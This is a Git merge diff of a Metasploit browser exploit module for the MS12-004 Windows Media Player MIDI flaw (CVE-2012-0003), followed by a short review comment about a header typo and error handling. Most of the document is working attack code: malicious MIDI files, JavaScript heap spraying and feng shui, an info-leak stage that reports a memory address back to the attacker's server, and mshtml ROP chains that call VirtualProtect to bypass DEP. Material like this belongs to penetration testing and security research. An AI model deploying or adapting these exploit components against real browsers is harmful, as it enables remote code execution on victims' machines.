Merge branch 'ms12_004_leaky_icky' of https://github.com/wchen-r7/metasploit-framework into wchen-r7-ms12_004_leaky_icky

unstable
jvazquez-r7 2012-12-21 21:01:05 +01:00
commit ff4b959c04
1 changed files with 290 additions and 193 deletions


@ -1,8 +1,8 @@
## ##
# This file is part of the Metasploit Framework and may be subject to # This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit # redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use. # Framework web site for more information on licensing and terms of use.
# http://metasploit.com/ # http://metasploit.com/framework/
## ##
require 'msf/core' require 'msf/core'
@ -11,6 +11,7 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::RopDb
include Msf::Exploit::Remote::BrowserAutopwn include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({ autopwn_info({
:ua_name => HttpClients::IE, :ua_name => HttpClients::IE,
@ -42,8 +43,11 @@ class Metasploit3 < Msf::Exploit::Remote
(CImplAry) we setup, and force the browser to confuse types from tagVARIANT objects, (CImplAry) we setup, and force the browser to confuse types from tagVARIANT objects,
which leverages remote code execution under the context of the user. which leverages remote code execution under the context of the user.
Note: At this time, for IE 8 target, you may either choose the JRE ROP, or the Note: At this time, for IE 8 target, msvcrt ROP is used by default. However,
msvcrt ROP to bypass DEP (Data Execution Prevention). if you know your target's patch level, you may also try the 'MSHTML' advanced
option for an info leak based attack. Currently, this module only supports two
MSHTML builds: 8.0.6001.18702, which is often seen in a newly installed XP SP3.
Or 8.0.6001.19120, which is patch level before the MS12-004 fix.
Also, based on our testing, the vulnerability does not seem to trigger when Also, based on our testing, the vulnerability does not seem to trigger when
the victim machine is operated via rdesktop. the victim machine is operated via rdesktop.
@ -61,16 +65,16 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'CVE', '2012-0003' ], [ 'CVE', '2012-0003' ],
[ 'OSVDB', '78210'], [ 'OSVDB', '78210'],
[ 'BID', '51292'], [ 'BID', '51292'],
[ 'URL', 'http://www.vupen.com/blog/20120117.Advanced_Exploitation_of_Windows_MS12-004_CVE-2012-0003.php' ], [ 'URL', 'http://www.vupen.com/blog/20120117.Advanced_Exploitation_of_Windows_MS12-004_CVE-2012-0003.php' ]
], ],
'Payload' => 'Payload' =>
{ {
'Space' => 1024, 'Space' => 1024
}, },
'DefaultOptions' => 'DefaultOptions' =>
{ {
'EXITFUNC' => "process", 'EXITFUNC' => "process",
'InitialAutoRunScript' => 'migrate -f', 'InitialAutoRunScript' => 'migrate -f'
}, },
'Platform' => 'win', 'Platform' => 'win',
'Targets' => 'Targets' =>
@ -79,39 +83,26 @@ class Metasploit3 < Msf::Exploit::Remote
[ [
'IE 6 on Windows XP SP3', 'IE 6 on Windows XP SP3',
{ {
'Rop' => nil, 'Rop' => false,
'DispatchDst' => 0x0c0c0c0c 'DispatchDst' => 0x0c0c0c0c
} }
], ],
[ [
'IE 7 on Windows XP SP3', 'IE 7 on Windows XP SP3',
{ {
'Rop' => nil, 'Rop' => false,
'DispatchDst' => 0x0c0c0c0c 'DispatchDst' => 0x0c0c0c0c
} }
], ],
[ [
'IE 8 on Windows XP SP3 with JRE ROP', 'IE 8 on Windows XP SP3',
{ {
# xchg ecx,esp # xchg ecx,esp
# or byte ptr [eax],al # or byte ptr [eax],al
# add byte ptr [edi+5Eh],bl # add byte ptr [edi+5Eh],bl
# ret 8 # ret 8
# From IMAGEHLP # From IMAGEHLP
'Rop' => :msvcr71, 'Rop' => true,
'StackPivot' => 0x76C9B4C2,
'DispatchDst' => 0x0c0c1be4
}
],
[
'IE 8 on Windows XP SP3 with msvcrt',
{
# xchg ecx,esp
# or byte ptr [eax],al
# add byte ptr [edi+5Eh],bl
# ret 8
# From IMAGEHLP
'Rop' => :msvcrt,
'StackPivot' => 0x76C9B4C2, 'StackPivot' => 0x76C9B4C2,
'DispatchDst' => 0x0c0c1bd0 'DispatchDst' => 0x0c0c1bd0
} }
@ -126,11 +117,39 @@ class Metasploit3 < Msf::Exploit::Remote
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false]) OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
], self.class) ], self.class)
register_advanced_options(
[
OptEnum.new('MSHTML',
[
false, "MSHTML Build Version", '',
[
'', #Default (no leaky leaky)
'8.0.6001.18702', #newly installed Win XP SP3 non patched
'8.0.6001.19120' #fully patched before KB2598479 - been the same at least since Sep 2011
]
])
], self.class)
end
def exploit
@m_name, @midi = get_midi
@ml_name, @midi_leak = get_midi("leak")
@second_stage_url = rand_text_alpha(10)
@leak_param = rand_text_alpha(5)
# Offset to CFunctionPointer vftable in MSHTML
case datastore['MSHTML']
when '8.0.6001.18702'
@offset = 0xbf190
when '8.0.6001.19120'
@offset = 0xd92c8
end
super
end end
def get_target(request) def get_target(request)
agent = request.headers['User-Agent'] agent = request.headers['User-Agent']
vprint_status("Request from: #{agent}") print_status("Request as: #{agent}")
if agent =~ /NT 5\.1/ and agent =~ /MSIE 6\.0/ if agent =~ /NT 5\.1/ and agent =~ /MSIE 6\.0/
#Windows XP SP3 + IE 6.0 #Windows XP SP3 + IE 6.0
@ -139,14 +158,15 @@ class Metasploit3 < Msf::Exploit::Remote
#Windows XP SP3 + IE 7.0 #Windows XP SP3 + IE 7.0
return targets[2] return targets[2]
elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8\.0/ elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8\.0/
#Windows XP SP3 + IE 8.0 + JRE6 #Windows XP SP3 + IE 8.0
return targets[3] return targets[3]
else else
return nil return nil
end end
end end
def get_midi # stage => "corruption" (default) | "leak"
def get_midi(stage="corruption")
# MIDI Fileformat Reference: # MIDI Fileformat Reference:
# http://www.sonicspot.com/guide/midifiles.html # http://www.sonicspot.com/guide/midifiles.html
# #
@ -183,9 +203,13 @@ class Metasploit3 < Msf::Exploit::Remote
tc << "\x85\x50\x99\x23\x7F" tc << "\x85\x50\x99\x23\x7F"
# Corruption events # Corruption events
if stage == "corruption"
# Midi Channel Event - Note On # Midi Channel Event - Note On
tc << "\x00\x9F\xb2\x73" tc << "\x00\x9F\xb2\x73"
# Ends Corruption events else
# Midi Channel Event - Note Off (trigger a leak)
tc << "\x00\x8F\xb2\x73"
end
# Meta Event - End Of Track # Meta Event - End Of Track
tc << "\x00\xFF\x2F\x00" tc << "\x00\xFF\x2F\x00"
@ -201,50 +225,76 @@ class Metasploit3 < Msf::Exploit::Remote
m << [tc.length].pack('N') m << [tc.length].pack('N')
m << tc m << tc
midi_name = "test_case.mid" #midi_name = "test_case.mid"
midi_name = rand_text_alpha(5) + ".mid"
return midi_name, m return midi_name, m
end end
def on_request_uri(cli, request) def on_request_uri(cli, request)
if request.uri =~ /\.mid$/i # Initialize a target. If none suitable, then we don't continue.
print_status("Sending midi file")
send_response(cli, @midi, {'Content-Type'=>'application/octet-strem'})
return
end
#Set default target
my_target = target my_target = target
#If user chooses automatic target, we choose one based on user agent
if my_target.name =~ /Automatic/ if my_target.name =~ /Automatic/
my_target = get_target(request) my_target = get_target(request)
if my_target.nil? agent = request.headers['User-Agent']
if my_target.nil? and agent !~ /Windows\-Media\-Player|NSPlayer/
send_not_found(cli) send_not_found(cli)
print_error("Unknown user-agent") print_error("Unknown user-agent")
return return
end end
vprint_status("Target selected: #{my_target.name}") vprint_status("Target selected: #{my_target.name}") if not my_target.nil?
end end
# Send the corrupt midi file to trigger a memory leak, or a crash to that points
# to an arbitrary address.
if request.uri =~ /#{@ml_name}$/i
print_status("Testing for info leak...")
send_response(cli, @midi_leak, {'Content-Type'=>'application/octet-strem'})
return
elsif request.uri =~ /#{@m_name}$/i
print_status("Sending midi corruption file...")
send_response(cli, @midi, {'Content-Type'=>'application/octet-strem'})
return
end
# Send the appropriate stage
if datastore['MSHTML'].to_s != '' and my_target['Rop']
if request.uri =~ /#{@second_stage_url}/
leak = begin
request.uri_parts["QueryString"][@leak_param].to_i
rescue
0
end
print_status("Leaked address: 0x#{leak.to_s(16)}")
send_stage(cli, my_target, 'trigger', leak)
return
end
send_stage(cli, my_target, 'leak')
else
send_stage(cli, my_target)
end
end
def send_stage(cli, my_target, stage='trigger', leak=0)
midi_uri = ('/' == get_resource[-1,1]) ? get_resource[0, get_resource.length-1] : get_resource midi_uri = ('/' == get_resource[-1,1]) ? get_resource[0, get_resource.length-1] : get_resource
if stage == 'leak'
midi_uri << "/#{@ml_name}"
trigger = build_trigger(my_target, "leak")
else
midi_uri << "/#{@m_name}" midi_uri << "/#{@m_name}"
trigger = build_trigger(my_target)
spray = build_spray(my_target) spray = build_spray(my_target, leak)
if datastore['OBFUSCATE']
spray = ::Rex::Exploitation::JSObfu.new(spray)
spray.obfuscate
end end
trigger = build_trigger(my_target)
trigger_fn = "trigger"
if datastore['OBFUSCATE'] if datastore['OBFUSCATE']
spray = ::Rex::Exploitation::JSObfu.new(spray).obfuscate
trigger = ::Rex::Exploitation::JSObfu.new(trigger) trigger = ::Rex::Exploitation::JSObfu.new(trigger)
trigger.obfuscate trigger.obfuscate
trigger_fn = trigger.sym("trigger") trigger_fn = trigger.sym('trigger')
else
trigger_fn = 'trigger'
end end
html = %Q| html = %Q|
@ -253,6 +303,7 @@ class Metasploit3 < Msf::Exploit::Remote
<script language='javascript'> <script language='javascript'>
#{spray} #{spray}
</script> </script>
<script language='javascript'> <script language='javascript'>
#{trigger} #{trigger}
</script> </script>
@ -276,39 +327,34 @@ class Metasploit3 < Msf::Exploit::Remote
html = html.gsub(/^\t\t/, '') html = html.gsub(/^\t\t/, '')
print_status("Sending HTML") print_status("Sending html to #{cli.peerhost}:#{cli.peerport}...")
send_response(cli, html, {'Content-Type'=>'text/html'}) send_response(cli, html, {'Content-Type'=>'text/html'})
end end
def exploit def build_spray(my_target, leak=0)
@m_name, @midi = get_midi
super
end
def build_spray(my_target)
# Extract string based on target # Extract string based on target
if my_target.name =~ /JRE ROP$/ if my_target.name == 'IE 8 on Windows XP SP3'
js_extract_str = "var block = shellcode.substring(2, (0x40000-0x21)/2);" js_extract_str = "var block = shellcode.substring(2, (0x40000-0x21)/2);"
js_shellcode = "var shellcode = nops.substring(0,0x800 - code.length) + code;"
elsif my_target.name =~ /msvcrt$/
js_extract_str = "var block = shellcode.substring(0, (0x80000-6)/2);"
js_shellcode = "var shellcode = nops.substring(0,0x800 - code.length) + code;"
else else
js_extract_str = "var block = shellcode.substring(0, (0x80000-6)/2);" js_extract_str = "var block = shellcode.substring(0, (0x80000-6)/2);"
js_shellcode = "var shellcode = nops.substring(0,0x800 - code.length) + code;"
end end
# Build shellcode based on Rop requirement # Build shellcode based on Rop requirement
if my_target['Rop'] code = ''
code = create_rop_chain(my_target) if my_target['Rop'] and datastore['MSHTML'].to_s != ''
print_status("Generating ROP using info-leak: 0x#{leak.to_s(16)}")
code << create_info_leak_rop(my_target, leak)
code << payload.encoded code << payload.encoded
shellcode = Rex::Text.to_unescape(code) elsif my_target['Rop'] and datastore['MSHTML'].to_s == ''
print_status("Generating ROP using msvcrt")
code << create_rop(my_target, payload.encoded)
else else
code = payload.encoded code << payload.encoded
shellcode = Rex::Text.to_unescape(code)
end end
shellcode = Rex::Text.to_unescape(code)
# 1. Create big block of nops # 1. Create big block of nops
# 2. Compose one block which is nops + shellcode # 2. Compose one block which is nops + shellcode
# 3. Repeat the block # 3. Repeat the block
@ -321,9 +367,7 @@ class Metasploit3 < Msf::Exploit::Remote
var nops = unescape("%u0c0c%u0c0c"); var nops = unescape("%u0c0c%u0c0c");
while (nops.length < 0x1000) nops+= nops; while (nops.length < 0x1000) nops+= nops;
var shellcode = nops.substring(0,0x800 - code.length) + code;
#{js_shellcode}
while (shellcode.length < 0x40000) shellcode += shellcode; while (shellcode.length < 0x40000) shellcode += shellcode;
#{js_extract_str} #{js_extract_str}
@ -340,7 +384,8 @@ class Metasploit3 < Msf::Exploit::Remote
end end
# Build the JavaScript string for the attributes # Build the JavaScript string for the attributes
def build_element(element_name, my_target) # type => "corruption" (default) | "leak"
def build_element(element_name, my_target, type="corruption")
dst = Rex::Text.to_unescape([my_target['DispatchDst']].pack("V")) dst = Rex::Text.to_unescape([my_target['DispatchDst']].pack("V"))
element = '' element = ''
@ -356,7 +401,12 @@ class Metasploit3 < Msf::Exploit::Remote
# Build attributes # Build attributes
0.upto(max) do |i| 0.upto(max) do |i|
case type
when "corruption"
obj = (i==index) ? "unescape(\"#{dst}\")" : "alert" obj = (i==index) ? "unescape(\"#{dst}\")" : "alert"
else #leak
obj = "alert"
end
element << "#{element_name}.w#{i.to_s} = #{obj}" + "\n" element << "#{element_name}.w#{i.to_s} = #{obj}" + "\n"
end end
@ -369,46 +419,9 @@ class Metasploit3 < Msf::Exploit::Remote
# 3. Make holes # 3. Make holes
# 4. Let windows media play the crafted midi file and corrupt the heap # 4. Let windows media play the crafted midi file and corrupt the heap
# 5. Force the using of the confused tagVARIANT. # 5. Force the using of the confused tagVARIANT.
def build_trigger(my_target) def build_trigger(my_target, type="corruption")
js_trigger = build_trigger_fn(my_target, type)
if my_target.name =~ /IE 8 on Windows XP SP3/ select_element = build_element('selob', my_target, type)
# Redoing the feng shui if fails makes it reliable
js_trigger = <<-JSTRIGGER
function trigger(){
var k = 999;
while (k > 0) {
if (typeof(clones[k].w1) == "string") {
} else {
clones[k].w1('come on!');
}
k = k - 2;
}
feng_shui();
document.audio.Play();
}
JSTRIGGER
select_element = build_element('selob', my_target)
else
js_trigger = <<-JSTRIGGER
function trigger(){
var k = 999;
while (k > 0) {
if (typeof(clones[k].w0) == "string") {
} else {
clones[k].w0('come on!');
}
k = k - 2;
}
feng_shui();
document.audio.Play();
}
JSTRIGGER
select_element = build_element('selob', my_target)
end
trigger = <<-JS trigger = <<-JS
var heap = new heapLib.ie(); var heap = new heapLib.ie();
@ -416,7 +429,6 @@ class Metasploit3 < Msf::Exploit::Remote
var clones = new Array(1000); var clones = new Array(1000);
function feng_shui() { function feng_shui() {
heap.gc(); heap.gc();
var i = 0; var i = 0;
@ -431,7 +443,6 @@ class Metasploit3 < Msf::Exploit::Remote
CollectGarbage(); CollectGarbage();
j = j + 2; j = j + 2;
} }
} }
feng_shui(); feng_shui();
@ -443,85 +454,171 @@ class Metasploit3 < Msf::Exploit::Remote
return trigger return trigger
end end
def junk(n=1) # type = "corruption" (default) | "leak"
tmp = [] def build_trigger_fn(my_target, type="corruption")
value = rand_text(4).unpack("L")[0].to_i js_trigger=""
n.times { tmp << value } case type
return tmp when "corruption"
js_trigger = js_trigger_fn_corruption(my_target)
when "leak"
js_trigger = js_trigger_fn_leak(my_target)
end
return js_trigger
end end
def nop # Redoing the feng shui if fails makes it reliable
return make_nops(4).unpack("L")[0].to_i def js_trigger_fn_corruption(my_target)
attribute = (my_target.name == 'IE 8 on Windows XP SP3') ? 'w1' : 'w0'
js = %Q|
function trigger(){
var k = 999;
while (k > 0) {
if (typeof(clones[k].#{attribute}) == "string") {
} else {
clones[k].#{attribute}('come on!');
}
k = k - 2;
}
feng_shui();
document.audio.Play();
}
|
return js
end end
def create_rop_chain(my_target) # Redoing the feng shui if fails makes it reliable
def js_trigger_fn_leak(my_target)
js_trigger = ""
if my_target.name == 'IE 8 on Windows XP SP3'
js_trigger = <<-JSTRIGGER
function trigger(){
var k = 999;
while (k > 0) {
if (typeof(clones[k].w1) == "string") {
var leak = clones[k].w1.charCodeAt(1)*0x10000 + clones[k].w1.charCodeAt(0)
document.location = "#{get_resource}/#{@second_stage_url}" + "?#{@leak_param}=" + leak
return;
}
k = k - 2;
}
feng_shui();
document.audio.Play();
}
JSTRIGGER
end
pivot = my_target['StackPivot'] return js_trigger
end
case my_target['Rop'] def create_rop(t, p)
when :msvcrt # MSVCRT.dll ROP
padding = ''
padding << [0x77C4CA70].pack("V*") #ADD ESP,0C; RET
padding << [t['StackPivot']].pack("V*")
padding << [0x77C4CA73].pack("V*") * 12 #ROP NOPs
generate_rop_payload('msvcrt', p, {'pivot'=>padding, 'target'=>'xp'})
end
def create_info_leak_rop(my_target, leak = 0x0)
base = (leak == 0x00) ? 0x63580000 : (leak - @offset)
print_status("Image base of mshtml: 0x%x" %base)
# Generate the gadgets based on offset
rop_gadgets = ''
case @offset
when 0xd92c8
rop_gadgets = rop_gadgets =
[ [
0x77c539ee, # RETN :junk,
pivot, :junk,
junk, 0x328468, # push ecx # pop esp # pop edi # pop esi # pop ebp # retn 14
0x77c4e392, # POP EAX # RETN :junk,
0x77c11120, # <- *&VirtualProtect() 0x247e5d, # ROP NOPs
0x77c2e493, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN 0x247e5d,
junk, 0x247e5d,
0x77c2dd6c, 0x247e5d,
0x77c4ec00, # POP EBP # RETN 0x247e5d,
0x77c35459, # ptr to 'push esp # ret' 0x247e5d,
0x77c47705, # POP EBX # RETN 0x247e5d,
0x00000400, # <- change size to mark as executable if needed (-> ebx) 0x247e5c, # POP ESI # RETN [mshtml.dll]
0x77c3ea01, # POP ECX # RETN 0x137c, # ptr to &VirtualProtect() [IAT mshtml.dll]
0x77c5d000, # W pointer (lpOldProtect) (-> ecx) 0x3c8db7, # MOV EDX,DWORD PTR DS:[ESI] # ADD EAX,8BCE8B00 # RETN [mshtml.dll]
0x77c46100, # POP EDI # RETN 0x42e239, # PUSH EDX # XOR EAX,EAX # POP ESI # POP EBP # RETN 0x08 [mshtml.dll]
0x77c46101, # ROP NOP (-> edi) :junk,
0x77c4d680, # POP EDX # RETN 0x3460c, # POP EBP # RETN [mshtml.dll]
0x00000040, # newProtect (0x40) (-> edx) :junk,
0x77c4e392, # POP EAX # RETN :junk,
nop, # NOPS (-> eax) 0x23ef79, # & jmp esp [mshtml.dll]
0x77c12df9, # PUSHAD # RETN 0x189303, # POP EBX # RETN [mshtml.dll]
].flatten.pack("V*") :ebx, # 0x00000201-> ebx
0x20437c, # POP EDX # RETN [mshtml.dll]
:edx, # 0x00000040-> edx
0xc277, # POP ECX # RETN [mshtml.dll]
0x53a47d, # &Writable location [mshtml.dll]
0x4a33e2, # POP EDI # RETN [mshtml.dll]
0x4b601, # RETN (ROP NOP) [mshtml.dll]
0x33fbc6, # POP EAX # RETN [mshtml.dll]
:nop,
0x52c718 # PUSHAD # RETN [mshtml.dll]
]
when :msvcr71 when 0xbf190
rop_gadgets = rop_gadgets =
[ [
0x7c347f98, # RETN (ROP NOP) :junk,
pivot, # stackpivot 0x3338ae, # push ecx # pop esp # pop edi # pop esi # pop ebp # retn 14
junk, # padding :junk,
0x7c376402, # POP EBP # RETN 0xe9e7, # POP ECX # RETN [mshtml.dll] 0x6358e9e7
0x7c376402, # skip 4 bytes :junk,
0x7c347f97, # POP EAX # RETN :junk,
0xfffff800, # Value to negate, will become 0x00000201 (dwSize) :junk,
0x7c351e05, # NEG EAX # RETN :junk,
0x7c354901, # POP EBX # RETN :junk,
0xffffffff, 0x1318, # ptr to &VirtualProtect() [IAT mshtml.dll]
0x7c345255, # INC EBX # FPATAN # RETN 0x48b440, # MOV EDX,DWORD PTR DS:[ECX] # RETN [mshtml.dll]
0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN 0x3dc745, # POP ESI # RETN [mshtml.dll]
0x7c344f87, # POP EDX # RETN :neg, # 0xffffffff
0xffffffc0, # Value to negate, will become 0x00000040 0x2fb18b, # INC ESI # RETN [mshtml.dll]
0x7c351eb1, # NEG EDX # RETN 0x35190d, # ADC ESI,EDX # DEC ECX # RETN 08 [mshtml.dll]
0x7c34d201, # POP ECX # RETN 0x4aada7, # POP EBP # RETN [mshtml.dll]
0x7c38b001, # &Writable location :junk, # Compensates RETN
0x7c34b8d7, # POP EDI # RETN :junk, # Compensates RETN
0x7c347f98, # RETN (ROP NOP) 0x1ffc54, # & jmp esp [mshtml.dll]
0x7c364802, # POP ESI # RETN 0x4498a7, # POP EBX # RETN [mshtml.dll]
0x7c3415a2, # JMP [EAX] :ebx, # 0x00000800: 0x00000201-> ebx
0x7c347f97, # POP EAX # RETN 0x24cce4, # POP EDX # RETN [mshtml.dll]
0x7c37a151, # ptr to &VirtualProtect() - 0x0EF (IAT) :edx, # 0x00000040-> edx
0x7c378c81, # PUSHAD # ADD AL,0EF # RETN 0x158306, # POP ECX # RETN [mshtml.dll]
0x7c345c30, # ptr to 'push esp # ret' 0x535098, # &Writable location [mshtml.dll]
].flatten.pack('V*') 0x1cf217, # POP EDI # RETN [mshtml.dll]
0xa0001, # RETN (ROP NOP) [mshtml.dll]
0x349f9b, # POP EAX # RETN [mshtml.dll]
:nop,
0x2afbe8 # PUSHAD # RETN [mshtml.dll]
]
end end
return rop_gadgets nops = make_nops(4).unpack("L")[0].to_i
rop_gadgets.map! { |e|
if e == :junk
rand_text(4).unpack("L")[0].to_i
elsif e == :neg
0xffffffff
elsif e == :ebx
0x00000800
elsif e == :edx
0x00000040
elsif e == :nop
nops
else
base + e
end end
}
chain = rop_gadgets.pack('V*')
return chain
end
end end
=begin
6367893A FF51 04 CALL DWORD PTR DS:[ECX+4]
=end
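Review bot: The Content-Type header on the two midi responses added in on_request_uri (the `@ml_name` and `@m_name` branches) carries the misspelling `application/octet-strem`, copied from the line this commit removes; both should send `{'Content-Type'=>'application/octet-stream'}`. In the same method the query-string read is wrapped in a bare `rescue` that returns 0, which hides any unrelated error (for example a NoMethodError if `uri_parts` does not expose the key) rather than only the missing-parameter case; since `nil.to_i` is already 0, `leak = (request.uri_parts["QueryString"] || {})[@leak_param].to_i` covers the absent parameter without swallowing everything. The MSHTML advanced option is documented in the description text but `exploit` leaves `@offset` unset for the empty default, so a one-line comment there such as `# @offset stays nil unless an MSHTML build is selected; only read by create_info_leak_rop` would make the coupling explicit. The class body starts and ends outside this section.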